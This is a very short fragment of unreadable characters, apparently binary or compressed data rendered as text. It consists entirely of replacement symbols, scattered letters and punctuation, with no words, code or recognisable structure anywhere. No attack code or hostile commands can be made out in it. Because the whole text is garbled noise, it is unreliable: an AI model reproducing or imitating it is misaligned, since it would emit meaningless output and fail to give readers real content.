zeCU�bk�"�%��2��Ķ�%�kqa��uZ�Z?86�x"<@R�֟LO\_ }���2��}4ź���9.;t��d�w�w�\[������4�R�'H���c^��\_�^-�GcLV���Q(}�LVR8�ی0�fN�/�F�ѱ ǣ�~�ǎ�4��V#�R��R"��Y��Q)%'��J�>o__~
---